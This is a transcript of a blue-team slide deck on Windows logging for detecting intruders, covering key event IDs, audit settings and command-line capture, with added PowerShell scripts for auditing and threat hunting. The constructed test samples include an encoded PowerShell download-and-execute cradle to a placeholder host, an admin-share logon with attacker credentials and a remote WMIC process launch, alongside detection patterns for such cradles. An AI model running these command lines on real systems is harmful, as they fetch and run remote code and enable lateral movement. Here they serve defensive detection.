Logs, Logs, Logs - What you need to know to catch a thief

This will help you get started with Windows logging: what to enable, configure, gather and harvest to start catching hackers in their tracks.

The Windows Logging Cheat Sheet and the SEXY Six Event IDs you MUST monitor and alert on.


1. Logs, Logs, Logs – What you need to know to catch a thief
Jason Freddy
MalwareArchaeology.com
2. Who am I
• Blue Team Defender Ninja, Logoholic, Malware Archaeologist
• I love logs – they tell us Who, What, Where, When and hopefully How
• Author of the “Windows Logging Cheat Sheet”
• @HackerHurricane, also my blog
• Inventor of the Malware Management Framework
3. Why are logs important?
• Have you ever had an incident and called a consultancy?
• What is one of the first, if not the first, things they do?
• Logs are referenced in every Verizon DBIR report
• LOGS!
• They hold the details of what happened, where, how and by whom
4. Yes, Logs ARE SEXY!
• SEXY – because logs tell you what a particular piece of malware did, or what the malwarian (aka Bad Actor) did, on your system(s)
• SEXY – because they are the one way you can get the details you need to know what happened
• SEXY – because this preso is going to show you how, for Windows systems
• SEXY – because if Target, Neiman Marcus, Michael’s, Home Depot… had done this, I wouldn’t have a presentation
• NOT SEXY – because most logs are not enabled or configured properly
• And because…
5. Malware and Logs
• I love malware and malware discovery
• But once I find an infected system, what happened before I found it?
• Was there more than one system involved?
• What did the malwarian do?
• What behavior did the system or systems have after the initial infection?
• Logs are the perfect partner to malware! If you do it right you could have detected all of this…
6. You’re Next
[Slide of breach headlines with their victim counts: 97,000; 76 Mil + 8 Mil; 1000+ businesses; 395 stores; 4.5 Million; 25,000; 4.9 Million; 4.03 Million; 105k transactions; 40 Million; 40 + 70 Million; $148 Mil; 33 locations; 650k (2010); 76,000; 670,000; 1900 locations; 145 Million; 20,000; 3 Million; 35,000; 60,000 alerts; 990,000; 56 Mil; 550,000; TBD; Citigroup, E*Trade Financial Corp., Regions Financial Corp., HSBC Holdings and ADP; ??????]
7. So why listen to me?
• I have been there
• In the worst way
• Found the malware quickly
• Discovered it 10 months before the Kaspersky report
• We needed to know more… Who, What, Where, When and How
• Found the logs were not fully enabled or configured, and we couldn’t get the data we needed
• Once the logs were enabled and configured, we saw all kinds of cool stuff and got the How that we ALL NEED
• After CryptoLocker I created the definitive guide:
  – “The Windows Logging Cheat Sheet”
8. Get this document!
• www.MalwareArchaeology.com/logs
9. So what can you do with logs?
10. You could catch CryptoWall
11. You can catch Malwarians
12. So what can we do with logs?
• More than you would have ever guessed
• Not only detect the Target, Neiman Marcus, Michael’s, Home Depot, Anthem, etc. intrusions
• But also government-sponsored malware like Casper, Regin, Cleaver, Stuxnet, Duqu, Flamer, etc.
• Yes, even the really bad stuff (well, good stuff to me ;-)
• IF… you know what to look for
• And that is why this talk… so you can learn WHAT to look for
13. Auditing
14. Audit the Registry
• Run keys, HKLM & HKCU
• Services – some keys are noisy; disable auditing on those
• Use Malware Management to guide you to the keys that matter
• Audit the keys that are not noisy. You will know which ones are noisy once you enable auditing and see tons of 4663 events
• Tune them to be quiet… which means: remove the normal
15. Audit Key Directories
• C:\PerfLogs
• C:\Users\xyx\AppData\Local
• C:\Users\xyx\AppData\LocalLow
• C:\Users\xyx\AppData\Roaming
• C:\Program Files
• C:\Program Files (x86)
• C:\ProgramData
• C:\Windows
• C:\Windows\System
• C:\Windows\System32
• C:\Windows\System32\wbem
• Every other Windows sub-directory that is small
16. Enable File Creation Auditing
• There are key locations that everyone should… MUST watch
• C:\Windows
• C:\Windows\System32
• ..\System32\WBEM
• Any directory with .EXE files in it
• Audit just CREATED FILES – auditing reads and writes to existing files is far too noisy
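An added example for slides 14-16 (this is not code from the deck or from the Windows Logging Cheat Sheet): it switches on the two Object Access audit subcategories that 4663 depends on and then puts a new-file/new-folder SACL on the directories slide 15 lists. It assumes Windows PowerShell 5.1 running elevated, because writing a SACL needs SeSecurityPrivilege; the registry keys from slide 14 are not touched here (set their SACLs in regedit under Permissions > Advanced > Auditing, or through GPO).

```powershell
# Added example for slides 14-16 (not from the deck or the cheat sheet).
# Windows PowerShell 5.1, run elevated: writing a SACL needs SeSecurityPrivilege.
#Requires -RunAsAdministrator

# 1. Without these subcategories no 4663 is ever written, SACL or not.
#    If legacy audit policy is also in use, enable "Force audit policy
#    subcategory settings" or the legacy policy overrides these.
auditpol /set /subcategory:"File System" /success:enable | Out-Null
auditpol /set /subcategory:"Registry"    /success:enable | Out-Null

# 2. Locations from slide 15; the Users\xyx entries are expanded to every profile.
$dirs = @(
    "$env:SystemDrive\PerfLogs",
    $env:ProgramData,
    $env:ProgramFiles,
    ${env:ProgramFiles(x86)},
    $env:SystemRoot,
    "$env:SystemRoot\System32",
    "$env:SystemRoot\System32\wbem"
)
$dirs += Get-ChildItem -Path "$env:SystemDrive\Users" -Directory | ForEach-Object {
    "$($_.FullName)\AppData\Local", "$($_.FullName)\AppData\LocalLow", "$($_.FullName)\AppData\Roaming"
}
$dirs = $dirs | Where-Object { $_ -and (Test-Path -LiteralPath $_) }

# 3. Audit only "create files" / "create folders" on Success. ContainerInherit
#    without ObjectInherit means sub-folders inherit the rule but files do not,
#    so a NEW file produces a 4663 while writes to existing files stay quiet
#    (slide 16: "just CREATED FILES"). Big trees such as C:\Windows take a
#    while to propagate; the deck's advice to prefer small sub-directories stands.
$rule = New-Object System.Security.AccessControl.FileSystemAuditRule(
    'Everyone', 'CreateFiles, CreateDirectories', 'ContainerInherit', 'None', 'Success')

foreach ($dir in $dirs) {
    $item = Get-Item -LiteralPath $dir
    # Read and write ONLY the Audit section. Set-Acl would also try to write the
    # owner back, which fails on TrustedInstaller-owned folders like C:\Windows.
    $sec = $item.GetAccessControl([System.Security.AccessControl.AccessControlSections]::Audit)
    $sec.SetAuditRule($rule)
    $item.SetAccessControl($sec)
    Write-Host "New-file SACL set on $dir"
}

# 4. Tuning check (slide 14: "remove the normal"): which objects generate the
#    most 4663s? Whatever tops this list every day is the noise to exclude.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4663 } -MaxEvents 500 -ErrorAction SilentlyContinue |
    ForEach-Object {
        ([xml]$_.ToXml()).Event.EventData.Data | Where-Object Name -eq 'ObjectName' | ForEach-Object '#text'
    } |
    Group-Object | Sort-Object Count -Descending | Select-Object -First 15 Count, Name
```

Run it once, let the box work for a day, then re-run only step 4: the entries that keep showing up (updaters, AV definition drops, temp files from a known app) are what the deck means by “the normal”, and they are what you exclude in the SIEM rather than by loosening the SACL.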
17. Audit Key Directories
18. File Auditing – New Files – 4663
19. New File detected
• New files created
  – Bladelogic.exe
• Event ID: 4663
20. CC Data file created
• New files created
  – Bladelogic.exe
• Event ID: 4663
21. Odd account used
• Logon – odd user?
  – Best1_user
• Event ID: 4624
22. The DETAILS
23. CMD.Exe executed
• New Process – Command Shell – YAY
• Event ID: 4688
24. CMD.Exe executed
• Knowing something suspicious executed is great
• BUT
• Knowing what was executed on the command line is VITAL to catching the thieves!!!
• VITAL!!!! #1 goal for you in 2015
25. Get the Command Line!
• It’s nice to know cmd.exe executed, but we REALLY want to see what was executed. It would be even better if we could see what svchost.exe was launched with!
• Again, Windows SUCKS by default, even Windows 8.1 and 2012 R2
  – I do think this is the K3wlest NEW logging feature – worth the upgrade!
• Now available for Windows 7 / Server 2008 R2 and later
  – Needs patch KB3004375
• Set the GPO (the setting only shows up in the editor if the Windows 8.1 / Server 2012 R2 administrative templates are in your policy store)
  – Computer Configuration\Administrative Templates\System\Audit Process Creation
  – “Include command line in process creation events”
  – http://technet.microsoft.com/en-us/library/dn535776.aspx
• Or set the registry value directly
  – HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
  – ProcessCreationIncludeCmdLine_Enabled, DWORD = 1
• And 4688 itself must be switched on: Advanced Audit Policy → Detailed Tracking → Audit Process Creation (Success). The registry value only adds the command line to events that are already being written
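An added example for slide 25 (not code from the deck): it sets the registry value and the audit subcategory the slide depends on, then proves the change took effect by spawning a process with a unique, harmless command line and finding that process’s 4688. It assumes an elevated Windows PowerShell prompt; the “cmdline-check-” marker is made up for this example.

```powershell
# Added example for slide 25 (not from the deck). Run elevated.
#Requires -RunAsAdministrator

$auditKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
if (-not (Test-Path $auditKey)) { New-Item -Path $auditKey -Force | Out-Null }
Set-ItemProperty -Path $auditKey -Name 'ProcessCreationIncludeCmdLine_Enabled' -Value 1 -Type DWord

# 4688 lives under Detailed Tracking > Process Creation. The registry value
# above only appends the command line to events that are already written.
auditpol /set /subcategory:"Process Creation" /success:enable | Out-Null
auditpol /get /subcategory:"Process Creation"

# Verification: launch something whose command line carries a unique marker
# (constructed for this example), then look for the 4688 that recorded it.
$marker = 'cmdline-check-' + [guid]::NewGuid().ToString('N')
Start-Process -FilePath "$env:SystemRoot\System32\cmd.exe" -ArgumentList "/c echo $marker" -WindowStyle Hidden -Wait
Start-Sleep -Seconds 2    # the audit record is written asynchronously

$hit = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 200 |
    Where-Object { $_.ToXml() -like "*$marker*" } |
    Select-Object -First 1

if ($hit) {
    Write-Host 'OK - 4688 now includes the command line:'
    ([xml]$hit.ToXml()).Event.EventData.Data |
        Where-Object { $_.Name -in 'SubjectUserName', 'NewProcessName', 'CommandLine' } |
        ForEach-Object { '{0,-16} {1}' -f $_.Name, $_.'#text' }
} else {
    Write-Warning 'No 4688 carrying the marker: a GPO may be overriding the registry value, or Process Creation auditing is not actually on.'
}
```

For a fleet, put the same two settings in a GPO rather than the registry, and re-run only the verification half on a sample of machines after each policy refresh. One caveat the deck’s own slide 35 output illustrates (a password in `/p:`): once command lines are logged, the Security log contains whatever users and admins type, credentials included, so treat that log and the SIEM index it lands in as sensitive.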
26. Command Line GOLD
27. Catch them trying to share
28. Not just CMD.EXE but the hack details
29. Not just CMD.EXE but the hack details (continued)
30. Another example
31. So what did we learn from these?
• You MUST enable command line logging
• Monitor these commands:
  – Cmd.exe – command shell
  – Netstat.exe – network connections
  – Cscript.exe – executes VBScript / JScript
  – Pushd – saves the current directory and changes to another (for Popd)
  – Popd – changes directory back
  – WMIC – executes WMI commands
  – Quser.exe – queries the logged-on users
  – Reg.exe – queries and edits the registry
  – SC.exe – creates, starts and stops services
  – Regini.exe – adds/edits registry values from a script
  – Attrib.exe – changes file attributes
  – Cacls.exe – changes file permissions
  – Xcacls.exe – changes file permissions
  – Takeown.exe – takes ownership of a file
  – Auditpol.exe – changes auditing settings (GPO can too)
  – Netsh – Windows Firewall and other network settings
32. Translate this into Event Codes – The SEXY SIX
• Process Create – 4688
  – Of course, enable command line logging
• File/Registry auditing – 4663
• Service created – 7045 (System log, not Security)
• Service changed – 7040 (System log, not Security)
• User login success – 4624
• Share accessed – 5140
33. The Manual way – 4688
• Look for executables run from Users\AppData

WevtUtil qe Security /q:"*[System[(EventID=4688)]]" /c:50 /rd:true /f:text | find /i "AppData" | find /i "New Process Name"

Gives you this:

New Process Name: C:\Users\<username>\AppData\Local\malware.exe
New Process Name: C:\Users\<username>\AppData\Local\Citrix\GoToMeeting\2185\g2mvideoconference.exe
New Process Name: C:\Users\<username>\AppData\Local\Citrix\GoToMeeting\2185\g2mui.exe
New Process Name: C:\Users\<username>\AppData\Local\Citrix\GoToMeeting\2185\g2mlauncher.exe
New Process Name: C:\Users\<username>\AppData\Local\Citrix\GoToMeeting\2185\g2mcomm.exe
New Process Name: C:\Users\<username>\AppData\Local\Citrix\GoToMeeting\2185\g2mstart.exe
New Process Name: C:\Users\<username>\AppData\Local\Citrix\GoToMeeting\2185\G2MInstaller.exe
New Process Name: C:\Users\<username>\AppData\Local\Citrix\GoToMeeting\2185\G2MInstaller.exe

Filter out Citrix…

WevtUtil qe Security /q:"*[System[(EventID=4688)]]" /c:50 /rd:true /f:text | find /i "AppData" | find /i "New Process Name" | find /i /v "Citrix\GoTo"

Gives you…

New Process Name: C:\Users\<username>\AppData\Local\malware.exe
34. The Manual way – 4688
• Last 1000 records

WevtUtil qe Security /q:"*[System[(EventID=4688)]]" /c:1000 /rd:true /f:text | find /i "New Process Name" | find /i "AppData"

New Process Name: C:\Users\<username>\AppData\Local\Temp\badstuff\malware.exe
New Process Name: C:\Users\<username>\AppData\Local\Temp\badstuff\malware.exe
New Process Name: C:\Users\<username>\AppData\Local\Temp\malware_users_Temp.exe
New Process Name: C:\Users\<username>\AppData\Local\NVIDIA\NvBackend\Packages\00007063\CoProc\update.19333411.exe
New Process Name: C:\Users\<username>\AppData\Roaming\Dropbox\bin\Dropbox.exe
New Process Name: C:\Users\<username>\AppData\Roaming\Dropbox\bin\update\Dropbox.exe
New Process Name: C:\Users\<username>\AppData\Roaming\Dropbox\bin\Dropbox.exe
New Process Name: C:\Users\<username>\AppData\Local\Apps\2.0\R9P169LK.0LA\EA80CTLH.BZ3\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe
New Process Name: C:\Users\<username>\AppData\Local\Apple\Apple Software Update\SetupAdmin.exe
New Process Name: C:\Users\<username>\AppData\Local\Temp\i4jdel0.exe
New Process Name: C:\Users\<username>\AppData\Local\Temp\e4j9473.tmp_dir1424306522\jre\bin\unpack200.exe
New Process Name: C:\Users\<username>\AppData\Local\Temp\e4j9473.tmp_dir1424306522\jre\bin\unpack200.exe
35. The Manual way – 4688
• Last 1000 records, command lines only, with the normal stuff filtered out (the trailing find /v "/i" drops the find.exe processes of this very pipeline, which get their own 4688s)

WevtUtil qe Security /q:"*[System[(EventID=4688)]]" /c:1000 /rd:true /f:text | find /i "Command" | find /i ".exe" | find /i /v "windows" | find /i /v "Program files" | find /i /v "taskeng.exe" | find /i /v "taskhost.exe" | find /i /v "logonUI.exe" | find /i /v "consent.exe" | find /i /v "programdata" | find /i /v "nvidia\nvbackend\packages" | find /i /v "dropbox" | find /i /v "/i"

Gives you…

Process Command Line: malware.exe
Process Command Line: malware.exe 25.233.45.123
Process Command Line: malware_users_Temp.exe /u:hacker /p:yurfracked
Process Command Line: wmiadap.exe /F /T /R
Process Command Line: rundll32.exe NVCPL.DLL,NvStartupRunOnFirstSessionUserAccount
Process Command Line: "C:\Users\MG\AppData\Local\Apps\2.0\R9P169LK.0LA\EA80CTLH.BZ3\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe"
Process Command Line: atbroker.exe
Process Command Line: C:\PROGRA~1\SUMOLO~1\wrapper.exe -s C:\PROGRA~1\SUMOLO~1\config\wrapper.conf
Process Command Line: winlogon.exe
Process Command Line: "C:\Users\MG\AppData\Local\Apple\Apple Software Update\SetupAdmin.exe"

What looks bad?
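An added example for slides 31 and 33-35 (not code from the deck): the Get-WinEvent equivalent of the wevtutil | find pipelines. It pulls 4688 records, drops an allow-list of the known-good paths the slides’ own output showed, and flags anything that ran from a user-writable location or that is one of the built-ins slide 31 says to watch. The allow-list and the five sample records at the end are constructed for this example; the live query at the bottom assumes an elevated prompt and command-line logging already enabled.

```powershell
# Added example for slides 31 and 33-35 (not from the deck).

# Allow-list of paths the deck's own output showed as benign; tune per site.
$AllowList = @('Citrix\GoToMeeting', 'NVIDIA\NvBackend', 'Dropbox\bin',
               'Apple Software Update', 'DellSystemDetect.exe')

# Slide 31's "monitor commands" list, as image names.
$WatchList = @('cmd.exe', 'netstat.exe', 'cscript.exe', 'wmic.exe', 'quser.exe',
               'reg.exe', 'sc.exe', 'regini.exe', 'attrib.exe', 'cacls.exe',
               'xcacls.exe', 'takeown.exe', 'auditpol.exe', 'netsh.exe')

function ConvertFrom-Event4688 {
    # Reduce a live Security/4688 record to the fields used below,
    # by field name rather than by position so it survives schema additions.
    param([Parameter(Mandatory, ValueFromPipeline)]$Event)
    process {
        $d = @{}
        ([xml]$Event.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        [pscustomobject]@{
            Time        = $Event.TimeCreated
            User        = $d['SubjectUserName']
            NewProcess  = $d['NewProcessName']
            CommandLine = $d['CommandLine']
        }
    }
}

function Find-SuspiciousProcess {
    param([Parameter(Mandatory, ValueFromPipeline)]$Record)
    process {
        $path = [string]$Record.NewProcess
        $cl   = [string]$Record.CommandLine
        $name = [System.IO.Path]::GetFileName($path).ToLowerInvariant()

        # Our own hunting generates 4688s too (the deck filters "/i" for the same reason).
        if ($cl -match 'Get-WinEvent|wevtutil|find /i') { return }
        if ($AllowList | Where-Object { $path -like "*$_*" }) { return }

        $reasons = @()
        if ($path -match '(?i)\\(AppData|Temp|ProgramData|Users\\Public|PerfLogs)\\') {
            $reasons += 'runs from a user-writable path'
        }
        if ($WatchList -contains $name) { $reasons += "watched binary: $name" }
        if ($reasons.Count) {
            $Record | Add-Member -NotePropertyName Reason -NotePropertyValue ($reasons -join '; ') -Force -PassThru
        }
    }
}

# Live use (elevated):
#   Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 1000 |
#       ConvertFrom-Event4688 | Find-SuspiciousProcess | Format-Table -AutoSize

# Constructed records mirroring slides 34/35 (not real log data):
$sample = @(
    [pscustomobject]@{ Time = Get-Date; User = 'mg';     NewProcess = 'C:\Users\mg\AppData\Local\Temp\badstuff\malware.exe'; CommandLine = 'malware.exe 25.233.45.123' },
    [pscustomobject]@{ Time = Get-Date; User = 'mg';     NewProcess = 'C:\Windows\System32\cmd.exe';                          CommandLine = 'cmd.exe /c net use \\10.0.0.5\c$ /user:hacker yurfracked' },
    [pscustomobject]@{ Time = Get-Date; User = 'mg';     NewProcess = 'C:\Windows\System32\wbem\WMIC.exe';                    CommandLine = 'wmic /node:10.0.0.5 process call create "cmd.exe /c whoami"' },
    [pscustomobject]@{ Time = Get-Date; User = 'mg';     NewProcess = 'C:\Users\mg\AppData\Roaming\Dropbox\bin\Dropbox.exe';  CommandLine = 'Dropbox.exe /systemstartup' },
    [pscustomobject]@{ Time = Get-Date; User = 'SYSTEM'; NewProcess = 'C:\Windows\System32\svchost.exe';                      CommandLine = 'svchost.exe -k netsvcs' }
)
$sample | Find-SuspiciousProcess | Format-Table User, NewProcess, Reason -AutoSize
```

On the sample set the first three records come back (user-writable path, cmd.exe, wmic.exe); Dropbox is allow-listed and svchost.exe matches nothing. cmd.exe will fire constantly on a busy box, which is the point of slide 31: the hit list is what you correlate with the user, the parent and the command line, not an alert on its own.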
36. Catch Dave’s SET & Metasploit too
37. Enable PowerShell command line logging
• It’s nice to know PowerShell executed, but we REALLY want to see what was executed
• Again, Windows SUCKS by default, PowerShell included
• Details on setting PowerShell preference variables
  – http://technet.microsoft.com/en-us/library/hh847796.aspx
• Set the execution policy to allow .PS1 files to execute so the default profile works
  – powershell Set-ExecutionPolicy RemoteSigned
• Create a default profile for all users and all hosts:
  – C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
• Add these to your default profile.ps1 file (the lifecycle variable writes events 500/501, command started/stopped, to the “Windows PowerShell” log)
  – $LogCommandHealthEvent = $true
  – $LogCommandLifecycleEvent = $true
• Splunk – inputs.conf
  – # Windows platform specific input processor
  – [WinEventLog://Windows PowerShell]
  – disabled = 0
• Upgrade to PowerShell version 3 or 4
• Investigating PowerShell Attacks (DEF CON & Black Hat 2014)
  – Ryan Kazanciyan, Technical Director, Mandiant
  – Matt Hastings, Consultant, Mandiant
38. Enable PowerShell command line logging
• And if a bypass is used? (-NoProfile, -ExecutionPolicy Bypass, -EncodedCommand… none of which ever load profile.ps1)
• Event code 4688 with the command line to the rescue!
• This is a MUST to alert on. If this occurs, you are being hacked!
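An added example for slides 37-38 (not code from the deck): a check to run over 4688 command lines that flags PowerShell launches which dodge the profile.ps1 logging (-NoProfile, -ExecutionPolicy Bypass, hidden windows) and decodes -EncodedCommand so the alert shows what actually ran. The command lines at the end are constructed for this example, including the encoded one, which is built in the script so it round-trips; the 192.0.2.10 address is a documentation-only address, not a real host.

```powershell
# Added example for slides 37-38 (not from the deck). Pure string logic:
# feed it the CommandLine field of 4688 records, live or from a SIEM export.

function Test-PowerShellBypass {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Only PowerShell launches are of interest here.
    if ($CommandLine -notmatch '(?i)(^|[\\\s"])(powershell(_ise)?|pwsh)(\.exe)?("|\s|$)') { return }

    $flags = @()
    # Any unambiguous prefix of a switch is accepted by powershell.exe,
    # so match the short forms attackers actually type.
    if ($CommandLine -match '(?i)\s-nop(rofile)?\b')                       { $flags += 'NoProfile (profile.ps1 logging skipped)' }
    if ($CommandLine -match '(?i)\s-(ep|ex|exec|executionpolicy)\s+bypass') { $flags += 'ExecutionPolicy Bypass' }
    if ($CommandLine -match '(?i)\s-(w|win|windowstyle)\s+hidden')         { $flags += 'hidden window' }
    if ($CommandLine -match '(?i)\s-noni(nteractive)?\b')                  { $flags += 'NonInteractive' }
    if ($CommandLine -match '(?i)(iex|invoke-expression|downloadstring|downloadfile|frombase64string)') {
        $flags += 'download/eval cradle'
    }

    $decoded = $null
    if ($CommandLine -match '(?i)\s-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})') {
        try {
            # -EncodedCommand is Base64 over UTF-16LE, not UTF-8.
            $decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
            $flags += 'EncodedCommand'
        } catch { $flags += 'EncodedCommand (not decodable)' }
    }

    [pscustomobject]@{
        Suspicious  = [bool]$flags
        Flags       = $flags
        Decoded     = $decoded
        CommandLine = $CommandLine
    }
}

# Constructed samples (not real log data).
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
$b64     = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($payload))
$samples = @(
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\mg\AppData\Local\Temp\a.ps1',
    "powershell.exe -nop -w hidden -enc $b64",
    'powershell.exe -Command "Get-Service"',
    'C:\Windows\System32\cmd.exe /c echo hello'
)
$samples | ForEach-Object { Test-PowerShellBypass -CommandLine $_ } |
    Where-Object Suspicious |
    Format-List Flags, Decoded, CommandLine
```

The first two samples are reported (the second with the decoded download cradle); the plain -Command launch and the cmd.exe line are not. This only works because 4688 carries the command line, which is why slide 38 leans on it; on PowerShell 5 and later, script block logging (event 4104 in Microsoft-Windows-PowerShell/Operational) records the script contents as well and is the complement to this check.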
39. Log everything!
• If it is Internet facing… LOG IT!
• Hack yourself or use pen tests to improve your logs – catch them in the act!
  – Purple testing
• You should catch SQL injection
  – Failed reads, failed writes in the database logs
• Brute-forcing of apps
  – Get the logs to see this behavior – #1 software development task
• Enable auditing for NEW files on Internet-facing servers; you will be amazed how quiet this is
40. In Summary
• Malware is noisy
• We CAN detect it
• Logs can hold all types of information
  – It’s NOT just for forensics anymore
• All we have to do is:
  – Enable the logs
  – Configure the logs
  – Gather the logs
  – Harvest the logs
• Look for the 6 SEXY events
• And use the “Windows Logging Cheat Sheet”
41. Resources
• Our website
  – MalwareArchaeology.com
• The handout – Windows Logging Cheat Sheet
  – www.MalwareArchaeology.com/logs
42. Questions?
• You can find me at @HackerHurricane
• Yes – we do consulting ;-)